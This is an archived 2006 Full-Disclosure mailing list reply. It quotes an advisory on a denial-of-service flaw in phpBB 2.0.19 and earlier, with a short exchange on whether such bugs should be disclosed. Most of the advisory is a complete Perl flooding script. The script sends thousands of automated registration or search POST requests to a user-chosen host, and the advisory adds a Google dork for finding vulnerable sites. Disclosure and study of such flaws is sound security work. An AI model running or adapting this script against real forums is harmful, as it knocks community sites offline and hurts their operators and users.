| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu Jan 26 11:31:35 2006
From: skodliv at gmail.com (poo)
Subject: HYSA-2006-001 phpBB 2.0.19 search.php
andprofile.php DOS Vulnerability
so what youre saying is that DoS exploits shouldnt be disclosed?
On 1/25/06, Edward Pearson <Ed@...tyitservices.co.uk> wrote:
>
> The less said about DoS attacks the better. A tactic mostly employed by
> asexual teenagers who live in their parent's basement and call themselves
> "h4x0rz".
>
> ------------------------------
> *From:* full-disclosure-bounces@...ts.grok.org.uk [mailto:
> full-disclosure-bounces@...ts.grok.org.uk] *On Behalf Of *h4cky0u
> *Sent:* 25 January 2006 14:44
> *To:* full-disclosure@...ts.grok.org.uk
> *Cc:* bugtraq@...urityfocus.com
> *Subject:* [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php
> andprofile.php DOS Vulnerability
>
>
>
> ------------------------------------------------------
> HYSA-2006-001 h4cky0u.org Advisory 010
> ------------------------------------------------------
> Date - Wed Jan 25 2006
>
>
> TITLE:
> ======
>
> phpBB 2.0.19 search.php and profile.php DOS Vulnerability
>
>
> SEVERITY:
> =========
>
> High
>
>
> SOFTWARE:
> =========
>
> phpBB 2.0.19 and prior
>
>
> INFO:
>
> =====
>
> phpBB is a high powered, fully scalable, and highly customizable
> Open Source bulletin board package. phpBB has a user-friendly
> interface, simple and straightforward administration panel, and
> helpful FAQ. Based on the powerful PHP server language and your
> choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
> phpBB is the ideal free community solution for all web sites.
>
> Support Website : http://www.phpbb.com
>
>
> BUG DESCRIPTION:
> ================
>
> The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -
>
> http://h4cky0u.org/viewtopic.php?t=637
>
> This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-
>
> profile.php << By registering as many users as you can.
> search.php << By searching in a way that the db cannot understand.
>
>
> Proof Of Concept Code:
> ======================
>
> #!/usr/bin/perl
> #######################################
> ## Recoded by: mix2mix and Elioni of http://ahg-khf.org
> ## And h4cky0u Security Forums (http://h4cky0u.org)
> ## Name: phpBBDoSReloaded
> ## Original Author: HaCkZaTaN of Neo Security Team
> ## Tested on phpBB 2.0.19 and earlier versions
> ## Ported to perl by g30rg3_x
> ## Date: 25/01/06
> #######################################
> use IO::Socket;
>
> ## Initialized X
> $x = 0;
>
> print q(
> phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
> Recoded by Albanian Hackers Group &
> h4cky0u Security Forums
>
> );
> print q(Host |without-> http://www.| );
> $host = <STDIN>;
> chop ($host);
>
> print q(Path |example-> /phpBB2/ or /| );
> $pth = <STDIN>;
> chop ($pth);
>
> print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
> $type = <STDIN>;
> chop ($type);
>
> ## Tipi p?r regjistrim
> if($type == 1){
>
> ## User Loop for 9999 loops (enough for Flood xDDDD)
> while($x != 9999)
> {
>
> ## Antari q? regjistrohet automatikisht? "X"
> $uname = "username=AHG__" . "$x";
>
> ## Emaili q? regjistrohet ne baz?n "X"
> $umail = "&email=AHG__" . "$x";
>
> $postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit
> ";
>
> $lrg = length $postit;
>
> my $sock = new IO::Socket::INET (
> PeerAddr => "$host",
> PeerPort => "80",
>
> Proto => "tcp",
> );
> die "\nNuk mundem te lidhemi me hostin sepse ?sht dosirat ose nuk egziston: $!\n" unless $sock;
>
> ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
> print $sock "POST $pth"."profile.php HTTP/1.1\n";
> print $sock "Host: $host\n";
> print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
> print $sock "Referer: $host\n";
> print $sock "Accept-Language: en-us\n";
> print $sock "Content-Type: application/x-www-form-urlencoded\n";
> print $sock "Accept-Encoding: gzip, deflate\n";
> print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
> print $sock "Connection: Keep-Alive\n";
> print $sock "Cache-Control: no-cache\n";
> print $sock "Content-Length: $lrg\n\n";
> print $sock "$postit\n";
> close($sock);
>
> ## Print a "+" for every loop
> syswrite STDOUT, "+";
>
> $x++;
> }
>
>
> ## Tipi 2-sh? p?r K?rkim(Flood)
> }
> elsif ($type == 2){
>
> while($x != 9999)
> {
> ## Final Search String to Send
> $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
>
> ## Posit Length
> $lrg = length $postit;
>
> ## Connect Socket with Variables Provided By User
> my $sock = new IO::Socket::INET (
> PeerAddr => "$host",
>
> PeerPort => "80",
> Proto => "tcp",
> );
> die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
>
> ## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
> print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
> print $sock "Host: $host\n";
>
> print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
> print $sock "Referer: $host\n";
> print $sock "Accept-Language: en-us\n";
> print $sock "Content-Type: application/x-www-form-urlencoded\n";
> print $sock "Accept-Encoding: gzip, deflate\n";
> print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8
> ) Gecko/20050511 Firefox/1.0.4\n";
> print $sock "Connection: Keep-Alive\n";
> print $sock "Cache-Control: no-cache\n";
> print $sock "Content-Length: $lrg\n\n";
> print $sock "$postit\n";
> close($sock);
>
> ## Print a "+" for every loop
> syswrite STDOUT, "+";
>
> ## Increment X in One for every Loop
> $x++;
> }
> }else{
> ## STF??? Qfar? keni Shtypur
> die "Mund?sia nuk Lejohet +_-???\n";
> }
>
>
> FIX:
> ====
>
> No fix available as of date.
>
>
> GOOGLEDORK:
> ===========
>
> "Powered by phpBB"
>
>
> CREDITS:
> ========
>
> - This vulnerability was discovered and researched by HaCkZaTaN of NeoSecurityteam.
>
>
> - Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest release of the script -
>
> Web : http://ahg-khf.org
>
> mail : webmaster at ahg-khf dot org
>
>
> - Co Researcher -
>
> h4cky0u of h4cky0u Security Forums.
>
> mail : h4cky0u at gmail dot com
>
> web : http://www.h4cky0u.org
>
>
> ORIGINAL ADVISORY:
> ==================
>
> http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt
>
> --
> http://www.h4cky0u.org
> (In)Security at its best...
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
--
smile tomorrow will be worse
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060126/af693009/attachment.html
Powered by blists - more mailing lists